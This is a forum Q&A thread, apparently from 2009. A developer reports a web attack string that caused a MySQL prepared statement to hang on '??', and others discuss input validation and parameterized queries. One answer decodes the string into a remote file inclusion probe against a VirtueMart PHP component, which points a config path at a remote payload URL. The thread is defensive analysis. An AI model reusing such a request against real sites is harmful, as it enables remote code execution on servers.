tags:

views:

89

answers:

2
+1  Q: 

Recent web attack and use of ?? in prepared MySQL statement

I recently had an attack on my site and the attacker tried to alter one of my SQL statements, by adding the following string

%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt

to a value.

Anyways, I don't use PHP or whatever this happened to be, but, the %3f%3f caused a problem: in MySQL prepare statement call, the double ?s hang.

Anyone else ran into this issue with double ?s before? I checked MySQL site and didn't find anything.

+1  A: 

This isn't a SQL injection attack, it appears to be a probe to see if you were vulnerable to some sort of "virtuemart" vulnerability.

//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt

Regardless of what language you use, you shouldn't be passing arbitrary GET data to your SQL queries. You need to implement some type of server side validation, as well as ensure your queries properly escape all user defined input.

hobodave  2009-08-11 02:35:23
A: 

Sorry, I posted this question on another browser elsewhere using an unregistered account.

I did forget a %3f%3f at the end of the string I included.

No it's not an injection attack, it's some attack on some PHP program which I don't use, but the attacker tried anyways.

I am using C++ bindings to MySQL, way down in the stack. The prepare statement hang with "??" I can verify this with other queries, not just the one I got via the attack.

I am taking in inputs and putting that in the query, but my platform automatically escapes <>&"' characters for all CGI inputs, and I am doing additional checks elsewhere for injection. This is actually legacy code. Newer version of the platform only allows parameterized SQLs, and only via a RPC to the database so you can only access certain tables and rows exposed by the RPC. So technically I won't have this problem anymore, but I am still curious why the "??" seems to hang.

Thanks.

OverClocked  2009-08-11 13:46:28

related questions

Remove Quotes and Commas from a String in MySQL
What's the best way of converting a mysql database to a sqlite one?
How do you manage databases in development, test, and production?
Multiple foreign keys?
Add 1 to a field (MySQL)
Issues using MS Access as a front-end to a MySQL database back-end?
Bigger than a char but smaller than a blob
How do I retrieve my MySQL username and password?
Long-time LAMP Developer moving to VB.NET
How do I Concatenate entire result sets in MySQL?
Full complete MySQL database replication? Ideas? What do people do?
SQL: Distribution of table in time
SQLite vs MySQL
How do I create a new Ruby on Rails application using MySQL instead of SQLite?
Multiple Updates in MySQL
MySQL/Apache Error in PHP MySQL query
What all do I need to escape when sending a (My)SQL query?
Auto Generate Database Diagram MySQL
Mechanisms for tracking DB schema changes
How big can a MySQL database get before performance starts to degrade.
Python and MySQL
SQL Server 2005 implementation of MySQL REPLACE INTO?
How to export data from SQL Server 2005 to MySQL
Throw Error In MySQL Trigger
Binary Data in MySQL